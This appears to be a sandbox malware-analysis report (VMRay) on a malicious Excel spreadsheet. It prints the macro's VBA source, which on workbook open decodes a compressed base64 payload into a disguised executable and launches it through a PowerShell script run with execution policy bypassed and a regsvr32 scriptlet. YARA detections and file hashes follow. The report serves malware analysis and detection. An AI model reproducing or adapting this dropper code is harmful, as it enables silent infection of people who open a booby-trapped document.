str = str + "ix+zV6tOu8Uo+/vzGNEMc0QlckSn2PrGeGbRLFR8bB035XlEUmwd0irH2WLJKuS6MMUc5HieWGwnJnMrVjtt3S1uYF6lvRJnmTKFI"
str = str + "soUXw/1ir5hFYsGeI0j2fcypbNM+ZQQt6YBT/E8Sdn8F3gGSj2dZ16ywKbEuM2Du9cbMYK9GDOh34fW4FTfKOhPeOi7Ht/V+G7AFy"
str = str + "PgWYPvOnxP4zuBL7yaJ4cv+PBgNfBgNngQQ3juxhc+JCT1t4nkKMOQZuE4a4ckGuZxKvBKR7Zx0raQCS4hT0mjJuKj0HaOYWrDkc6"
str = str + "SalyRx9RiGUV/BjQLXD7K4yC92iqMfCf0RX80D0iHU4Cm8ZxkSqP2GjkmlMB+rNqDtFrf0MIed9S2XTdnLZAoDStsI0td0sean2C6"
str = str + "OXGPq2dRt81e6bMcm4hlV+PwbvTALRbdi3otZT/XgtwmxghfCzQpjN22HZb7iLewZqp4WiipVFpz29l3bLHdmRMaFcUQMziFgIWYJ"
str = str + "7e5mc2YloGVXNdxi0P2kG22B2uazWmEVbjSdumTqFdEjVP2pOxg1jrK4nSw0RLkUOvgqWjZA0ouej8LR6GIWLiFJxwtjVM8PDnaHP"
str = str + "RcjxRFlxwiQuHYbnxp0yKO1La/duta2WRAVVnEhmyJyGCuVlY1OLNvHbdnr1zpK+txC9vzJNs0zdk2XqMtnrkpe1VajZk7LLYhmiY"
str = str + "7JewEtyefN4iI0ilxnocF7bcGObcXdXYDuh048kStKN0G/FFAN6B3ZfZtvz6sjbChT6Bfh7lfI72dZu86XWbtD359WDsMmmTV0zx3"
str = str + "tqGnc2U2n/x1YnNPma0LV2dr8Fdiaw8vONNok2EK02VXXM3MUUB7HXZWV7hx93CtZVZESJyzticTsw9fr0BDIFrigdoPts9znC6jj"
str = str + "D1M2CxH6o7QR1ws9dewNOhiCYKsv17qtEakK7FX1s097VadWMmtjv3MkbM6yr33fXb8XZFvLy8TI8zdPkjRzzWpjVJH7tDV68ZbeR"
str = str + "XvrKE8H1VHbhrc80KJH2GTlxFERkZIiwZteZ0IKs9yY4F5/RWTAy/3oUFlRcvypiPLR0xBEcGakGO1y4VbbgMyEL/A0ATWr5QdWlZ"
str = str + "w1G7QDrsqQWsKawexLg9EiKl9UMzdtlBpDNgRtBrlNYi2KHQdwmnbAgUR1atxIWm7A+Qd4Klgh7Q7kJ5hFZHkU/ZaO8grXI63+0Xu"
str = str + "vxW4Yxz80NHedkzeAZ7Erdx/CishGfBxbOaK9gw4jsGa5hiADOs4H+aM2nqU63kL812rIcnv1aVpt3vaxwePOTaGQ65t2KCQmzxZU"
str = str + "tlSuw8vU8J9eCn5qNVwllcY8ypjWLTHsFBjkMS7NNbaEZQTZAoanWLpN1VN12rDdsbUsb1J7mvznP66qmwmPYfTDrbYaR73WriaEs"
str = str + "VimGg916/XM5Cv+Au1cDZmg3z4NQT5+2BHOzCWe7gO8VPkMSkB5968kTX1s4d2osHDtpXJQPc46NBxhbjh+nihrUKxZrSllSCYXuQ"
str = str + "ctUmbydgrJrYzCzNwH/IoqovtmuJB0UzYjL2BoshOHqKWyxc5ONognHeXNLlb3iPkEWK5VCc99SG434M1SIT64TD7oKkdXHIQGhAe"
str = str + "Ku2jy+2BPiH/hF7kmFzEV4gV0DIdyw+iDeWEQekQ2h5yMB4LX4yiB1skzzS+Z9DTnZC4EzycEIpxp7jLztH2HBjPKGqN4IsN14Otz"
str = str + "snGWrGBzzs28jk1nWisgW/uBSOVc461DK1hTA+gDUgzfOrRy7gst+i1W2xCbu7py9QcQ3FOXe6znYp7mAvl09trtbvWic612l1vTf"
str = str + "oU/uLp5Y92fOHWt3819dMzH/2rnwpvSlH8nhQ29QAMg7JRSlSfrjZF/QDVqFco0ahPqFFKlSZfVBOqEm3yIRPLRRfrsVh9bE80qqq"
str = str + "xA34PKsUOxcJ+vz92zJdS8QT1qKoRAVDQBNUgOtGmqC68lCF6sQNR6rfRHxCe2KFo1Jh9Eu384ApECXfAwam+lIjNPqOhZPbtfjya"
str = str + "ok0ejYjX+8GpEkWvSmMDClDhfaDpb0zokWgsEzsWy6LTKDhvisZ2+KOBFERsAtkPekEyA9qNJHojM+cDGdT1ChE7ppHsTdFIvaI0L"
str = str + "RULY7OfVJYKT1CRYjSGgPfbWFBqapT1G4kbv0dX/IF6RfWj5VIR1HWiStJ4hCBWo1CQgFCk0sYFuuH3q7E9flaLnx6sfj/pJhrt0V"
str = str + "eC8Sjph5oReMBPnMn6RBUgimOHmghCnaDiQVMPDWTUj060KN2PJAoB3YcmuWjsBCv0JQ2yGLNf4XFuZNQ3dN0bBjNhqd0w6ZJUHA7"
str = str + "7dBrFOj3A/TbFpvyxKeM0KMRm/wlCCWCgCON0XK/3q1E1KsWJktbZpBo1HSPv94R1P4Rg/v2s6hzUBa2i83/F0JOp6Z4mn5+Mxxcl"
str = str + "a8DA6Ixq8mm6GpumcULtV2nQo1EdqTH7s6g/hSrobjoIITHc+KOyJsrYZWioE4JT1a97YwPARcFRgLQJc8mS5jXm5kEFdgv6qleLP"
str = str + "RgAJaRRlfts5JGjWsaDEf9H7jl+eNGalx/FBOoWilB7hZf+iQ2P1oQp4Fc11aPFduA7gG89rAfGi9FXyGAwYnI+qCp3pvK02GFPGV"
str = str + "XVgaRRBVMwGsX+X3stpV+aDKmJI1amsNfMl2/FDE1Y5tmignry/+jVooimfSdP5kazqUN8TzFlX5xI7cnkM3T1RPgUqhhVRKB8kRO"
str = str + "LhiIWyPfGxdTQRHYqW0z1jdNrdlGniODW3u6e7k4k64S4URErRntG165Zt7a7s3vDaE/nmpPZsc7MyXWZzvVr12wcya7tyWbWYEEJ"
str = str + "K0Lv6eqmPyFuVcTirr07hsr34jrs21eb6TdakC26oFxk30elS0X11CZVLkmtsX8ihY/z/3Ejwem38hNvxBdr8sHB7YN3f+vf4smv/"
str = str + "/Pu3/vw6h/GHv0e/RP4on/Tcbo7Uzx+Njc5mctMHd9ujsqrDscP54rTmcnUYGl6LGemIOfa4/ZdhuLxyr0GN2iO3H38YHYymylmXe"
str = str + "iuwpjzy7Bfz897L1TgP3P+P3fzfD56wZ0b7jetHeeyfG+Mb+Jms11jk5NcdqVVpLb+Epyo/Ds4dE8/n6R397PV5fJ3VhvmwdOnBlm"
str = str + "uP3GV+t1wOo8/LcTTnkrJ03SajLBmEAFs9fnAMJ57EczwD2TEJ73ff638f6lz0dxi57yi9k63ENsZd5iDuZ32m9MBftdocvkKbjVk"
str = str + "n0IXeV9bPkXlz/Neek+pVG2N5lL6Fv8apbv8twZBcjdTXgp8v/02oXygWRU6p6oC1lRNyOocWMh39HAboB0s03T2u3vtw1T6zA2qB"
str = str + "agTHw7f2zn4r4TBFXl/Fb664SIrfVQH6vTpQWTUXf4KcYuoQ/3K+wy5G69Ish3woL1BcjZU5c0EPptECO13IzfOLUkjBejC4vfIEy"
str = str + "z3Vo4re/gNl4TWcds2ttNKW2kBY3wCIk8LimUb2sl87rPp5mw+HTnz183vbWIh/TKJy+kNP5W7x61640PnQBPMT5ZzfaznPEtFNuC"
str = str + "fQ6tW47X63sBt+njbl+UTmEk+6fl57bY+J8Q/uibW9z/+qZu3nJuaTJ2xF44WLC4tqax9uXdzy6GhnZ0bWlJFvl81aeazm1vOZ4st"
str = str + "W26JBCPBmzP29aUUSOSLm1umrfym4iiWukyxc8pZCDtHzalNmeJU15meltRUJp87mS2WDrv7A7FUqkxsYAzrR650voon+mtJ0QX3z"
str = str + "S17zvcVCpP2FfeuTKHQskpSKFnTRb64ep389Mqe0bKYHZ220KedB8a+u5Yd22/lzuQms+NYva+P6uqWMhU3HXlzGxzvzp7JTqYmKd"
str = str + "3ckikO5M+Yp7JWS2o618c3DDe38D1pWygmsmoebhzWV1XxfvOqshKQv3mVo9RbxH99/n/8zMrf5H998382I//1+c/4/F+4Yla1AHo"
str = str + "AAA=="";$byteArray = [System.Convert]::FromBase64String($content);$input = New-Object System.IO.Memory"
str = str + "Stream( ,$byteArray );$output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO."
str = str + "Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress);$gzipStream.CopyTo( $ou"
str = str + "tput );$gzipStream.Close();$input.Close();[byte[]] $byteOutArray = $output.ToArray();[System.IO.File]"
str = str + "::WriteAllBytes(""$env:TEMP\OfficeUpdateService.exe"",$byteOutArray);iex ""$env:TEMP\OfficeUpdateService"
str = str + ".exe"";"

    Set Oshell = CreateObject("WScript.Shell")
    temp_dir = Oshell.ExpandEnvironmentStrings("%TEMP%")
    ps_file_dir = temp_dir + "\WINDOWSTEMP.ps1"
    
    Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(ps_file_dir, 2, True)
    objFileToWrite.WriteLine (str)
    objFileToWrite.Close
    Set objFileToWrite = Nothing
    Dim powershell_command As String
    powershell_command = "powershell.exe -noexit -exec bypass -File " + ps_file_dir
    powershell_command = Replace(powershell_command, "\", "\\")
    Dim sct_file As String
    sct_file = "<?XML version=""1.0""?>" + vbCrLf
    sct_file = sct_file + "<scriptlet>" + vbCrLf
    sct_file = sct_file + "<registration" + vbCrLf
    sct_file = sct_file + "progid = ""PoC""" + vbCrLf
    sct_file = sct_file + "classid=""{F0001111-0000-0000-0000-0000FEEDACDC}"" >" + vbCrLf
    sct_file = sct_file + "<script language=""JScript"">" + vbCrLf
    sct_file = sct_file + "<![CDATA[ var r = new ActiveXObject(""WScript.Shell"").Run(""" + powershell_command + """,0,true); ]]>" + vbCrLf
    sct_file = sct_file + "</script>" + vbCrLf
    sct_file = sct_file + "</registration>" + vbCrLf
    sct_file = sct_file + "</scriptlet>" + vbCrLf
    Dim sct_file_path As String
    sct_file_path = temp_dir + "\12-B-366.txt"
    Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(sct_file_path, 2, True)
    objFileToWrite.WriteLine (sct_file)
    objFileToWrite.Close
    Set objFileToWrite = Nothing
    
    'sct_file_path = Replace(sct_file_path, "\", "\\")
    Dim final_command As String
    final_command = "regsvr32.exe /s /n /u /i:" + sct_file_path + " scrobj.dll"
    Call Shell(final_command, vbHide)
    
End Sub
Private Sub Workbook_Open()

New_Macro

End Sub

Macro #2: Module1
»
Attribute VB_Name = "Module1"
Sub Excel()

End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
C:\Users\aETAdzjz\AppData\Local\Temp\OfficeUpdateService.exe Created File Unknown
Whitelisted
»
Mime Type application/x-empty
File Size 0.00 KB
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-05-27 11:27 (UTC+2)
Last Seen 2017-04-19 12:47 (UTC+2)
de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/xml
File Size 0.66 KB
MD5 657ada625cec137fc53e444956261bab Copy to Clipboard
SHA1 a33d091b2aa6689be34815b4784811f45c4dd745 Copy to Clipboard
SHA256 de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Copy to Clipboard
SSDeep 12:TMHdtl46fxhmflbEOEfWKvA1EI+DYQBsOD3O7xVIO/GaBTslXyld:2dti6fxhmflYZf8P+Kw3O7x6O/BTsEld Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-12-21 23:40 (UTC+1)
Last Seen 2018-11-28 16:48 (UTC+1)
901734ae6b4b668d23512343a5bc0b1cad9401cfa095ff37365e85410f203c95 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/xml
File Size 0.77 KB
MD5 446d99f36c6f29f8330d58bc3655eb71 Copy to Clipboard
SHA1 a055ba0b49550175879948cd4d9bd8d0d0394b0c Copy to Clipboard
SHA256 901734ae6b4b668d23512343a5bc0b1cad9401cfa095ff37365e85410f203c95 Copy to Clipboard
SSDeep 24:2dt06fxhmflYZf8qC+B22n12LZ4mLXAQJ:cV5hmNYZt1B7E4mzAO Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2016-07-08 02:01 (UTC+2)
Last Seen 2018-04-14 13:19 (UTC+2)
ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/xml
File Size 0.66 KB
MD5 c1a08e4a5909ec8a545236a0d9bce44d Copy to Clipboard
SHA1 63561ba33e3e8615f5883f6da15de948ad65578a Copy to Clipboard
SHA256 ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Copy to Clipboard
SSDeep 12:TMHdtWa6fmEUdzXb6flbEIWOgzXa6flbEetzXV6flbEpSp0HjzXQ4+DYQDE0US1V:2dtWa6ffa7b6flYIO7a6flYq7V6flYm1 Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-03-17 16:09 (UTC+1)
Last Seen 2018-11-28 16:48 (UTC+1)
C:\Users\aETAdzjz\AppData\Local\Temp\WINDOWSTEMP.ps1 Created File Text
Unknown
»
Mime Type text/plain
File Size 17.76 KB
MD5 e6d55fffc72e853d24440ef89e216611 Copy to Clipboard
SHA1 293a8817bc2e35ad4db630dd58dc8229523ac252 Copy to Clipboard
SHA256 93a530e6d04e88730fd787d31f9a8e69fcbae3a14ba650008d1b5712ecb2cfb2 Copy to Clipboard
SSDeep 384:LOi5Zg5RQ60lRrUbLmagfOypXquFGRawwha5gCvZQ28kS4n:Lh57lRruLm1dGRNw05gAZR86n Copy to Clipboard
c:\users\aetadzjz\appdata\local\temp\12-b-366.txt Created File XML
Unknown
»
Mime Type application/xml
File Size 0.36 KB
MD5 ce86eb5b2736c66df0af4dd826d4dd55 Copy to Clipboard
SHA1 17d630f02db15facff4e0acd56f3559b092df81f Copy to Clipboard
SHA256 b2c99d88252ab0b9ab4be05290afaaa8e64bbcd9292dfe07cef905b2f37e5d33 Copy to Clipboard
SSDeep 6:RlS0tu4oQ+KmWP+GGJ7vuYOMiUXZrlNHsnyLmyCpYOaoNkDv5NrjSTptZAB/MGni:Rlz9T16GgrXsnF/E5N3rMG4wI Copy to Clipboard
44f17db02bafeba41c4a4fbdf8b51db19b474494e2d7ad61a1e7ccf9bbb0d97b Embedded File Unknown
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/CDFV2-unknown
File Size 59.00 KB
MD5 dd2b4d38f97c936d59a3a4f3da7c5a63 Copy to Clipboard
SHA1 4214d027373c30e57eac5ada7ba89ace2123ef51 Copy to Clipboard
SHA256 44f17db02bafeba41c4a4fbdf8b51db19b474494e2d7ad61a1e7ccf9bbb0d97b Copy to Clipboard
SSDeep 768:HiBmb4bB/lusULOOteXORC7x55GZv4FQDnAAJxBUFtCaPuIhNXEIpZSPu:HiBC4FlusKDs7x5EDnAEDSAamIhlb Copy to Clipboard
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image